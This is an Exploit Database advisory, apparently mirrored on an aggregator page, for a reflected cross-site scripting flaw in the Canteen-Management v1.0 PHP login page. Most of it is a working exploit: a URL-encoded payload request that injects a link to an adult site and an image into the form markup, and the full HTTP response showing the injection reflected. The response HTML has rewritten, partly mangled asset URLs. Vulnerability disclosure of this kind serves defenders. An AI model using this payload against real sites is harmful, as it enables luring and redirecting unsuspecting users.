Canteen-Management v1.0 – XSS-Reflected

• Exploit Database
• 18 阅读

• 作者： nu11secur1ty
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51062/

• ## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
  ## Exploit Author: nu11secur1ty
  ## Date: 10.04.2022
  ## Vendor:Free PHP Projects & Ideas with Source Codes for Students |
  mayurik <https://www.mayurik.com/>
  ## Software:
  https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
  ## Reference:
  https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management
  
  ## Description:
  The name of an arbitrarily supplied URL parameter is copied into the value
  of an HTML tag attribute which is encapsulated in double quotation marks.
  The attacker can craft a very malicious HTTPS URL redirecting to a very
  malicious URL. When the victim clicks into this crafted URL the game will
  over for him.
  
  [+]Payload REQUEST:
  
  ```HTML
  GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22
  https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me
  HTTP/1.1
  Host: pwnedhost.com
  Accept-Encoding: gzip, deflate
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106",
  "Chromium";v="106"
  Sec-CH-UA-Platform: Windows
  Sec-CH-UA-Mobile: ?0
  ```
  
  [+]Payload RESPONSE:
  
  ```burp
  HTTP/1.1 200 OK
  Date: Tue, 04 Oct 2022 09:44:55 GMT
  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
  X-Powered-By: PHP/8.1.6
  Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Content-Length: 6140
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  <link rel="stylesheet" href="https://www.exploit-db.com/exploits/51062/assets/css/popup_style.css">
   <style>
  .footer1 {
  position: fixed;
  bottom: 0;
  width: 100%;
  color: #5c4ac7;
  text-align: center;
  }
  
  </style>
   <!DOCTYPE html>
  <html lang="en">
  
  <head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,
  user-scalable=0, minimal-ui">
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="description" content="">
  <meta name="keywords" content="">
  <meta name="author" content="">
  
  <link rel="icon" type="image/png" sizes="16x16"
  href="https://www.exploit-db.com/exploits/51062/assets/uploadImage/Logo/favicon.png">
  
  
  
  
  
   <style type="text/css">
  @media print {
  #printbtn {
  display :none;
  }
  }
  </style>
  <title>Youthappam Canteen Management System - by Mayuri K.
  Freelancer</title>
  
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/owl.theme.default.min.css" rel="stylesheet"
  />
  
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/bootstrap/bootstrap.min.css"
  rel="stylesheet">
  
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/helper.css" rel="stylesheet">
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/style.css" rel="stylesheet">
   <link rel="stylesheet"
  href="https://www.exploit-db.com/exploits/51062/assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
   <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
  <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/calendar2/pignose.calendar.min.css"
  rel="stylesheet">
   <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
   <link href="https://www.exploit-db.com/exploits/51062/assets/css/lib/datepicker/bootstrap-datepicker3.min.css"
  rel="stylesheet">
  
  
  <script type="text/javascript" src="https://www.exploit-db.com/exploits/51062/
  https://www.gstatic.com/charts/loader.js"></script>
  <script type="text/javascript">
  google.charts.load("current", {packages:["corechart"]});
  google.charts.setOnLoadCallback(drawChart);
  function drawChart() {
  var data = google.visualization.arrayToDataTable([
  ['Food', 'Average sale per Day'],
  ['Masala dosa', 11],
  ['Chicken 65 ',2],
  ['Karapu Boondi',2],
  ['Bellam Gavvalu', 2],
  ['Gummadikaya Vadiyalu',7]
  ]);
  
  var options = {
  title: 'Food Average Sale per Day',
  pieHole: 0.4,
  };
  
  var chart = new
  google.visualization.PieChart(document.getElementById('donutchart'));
  chart.draw(data, options);
  }
  </script>
  </head>
  
  <body class="fix-header fix-sidebar">
  
  <div id="page"></div>
  <div id="loading"></div>
  
  
  
  
  
  <div id="main-wrapper">
  <div class="unix-login">
  
  <div class="container-fluid" style="background-image:
  url('assets/myimages/background.jpg');
   background-color: #ffffff;background-size:cover">
  <div class="row">
  <div class="col-lg-4 ml-auto">
  <div class="login-content">
  <div class="login-form">
  <center><img
  src="https://www.exploit-db.com/exploits/51062/assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
  <form
  action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"
  target="_blank" rel="noopener nofollow ugc"> <img src="https:/
  raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"
  method="post" id="loginForm">
  <div class="form-group">
  
  <input type="text" name="username"
  id="username" class="form-control" placeholder="Username" required="">
  
  </div>
  <div class="form-group">
  
  <input type="password"
  id="password" name="password" class="form-control" placeholder="Password"
  required="">
  </div>
  
  
  <button type="submit" name="login"
  class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>
  
  <!-- <div class="forgot-phone text-right
  f-right">
  <a href="https://www.exploit-db.com/exploits/51062/#" class="text-right f-w-600"> Forgot Password?</a>
  </div> -->
  
  <div class="forgot-phone text-left f-left">
  <a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development
  Requirement&body = I saw your projects. I want to develop a project"
  class="text-right f-w-600"> Click here to contact me</a>
  </div>
  </form>
  </div>
  </div>
  </div>
  </div>
  </div>
  </div>
  </div>
  
  
  
  
  <script src="https://www.exploit-db.com/exploits/51062/assets/js/lib/jquery/jquery.min.js"></script>
  
  <script src="https://www.exploit-db.com/exploits/51062/assets/js/lib/bootstrap/js/popper.min.js"></script>
  <script src="https://www.exploit-db.com/exploits/51062/assets/js/lib/bootstrap/js/bootstrap.min.js"></script>
  
  <script src="https://www.exploit-db.com/exploits/51062/assets/js/jquery.slimscroll.js"></script>
  
  <script src="https://www.exploit-db.com/exploits/51062/assets/js/sidebarmenu.js"></script>
  
  <script
  src="https://www.exploit-db.com/exploits/51062/assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>
  
  <script src="https://www.exploit-db.com/exploits/51062/assets/js/custom.min.js"></script>
  <script>
  
  function onReady(callback) {
  var intervalID = window.setInterval(checkReady, 1000);
  function checkReady() {
  if (document.getElementsByTagName('body')[0] !== undefined) {
  window.clearInterval(intervalID);
  callback.call(this);
  }
  }
  }
  
  function show(id, value) {
  document.getElementById(id).style.display = value ? 'block' : 'none';
  }
  
  onReady(function () {
  show('page', true);
  show('loading', false);
  });
  </script>
  </body>
  
  </html>
  ```
  
  ## Reproduce:
  [href](
  https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management
  )
  
  ## Proof and Exploit:
  [href](https://streamable.com/emg0zo)
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>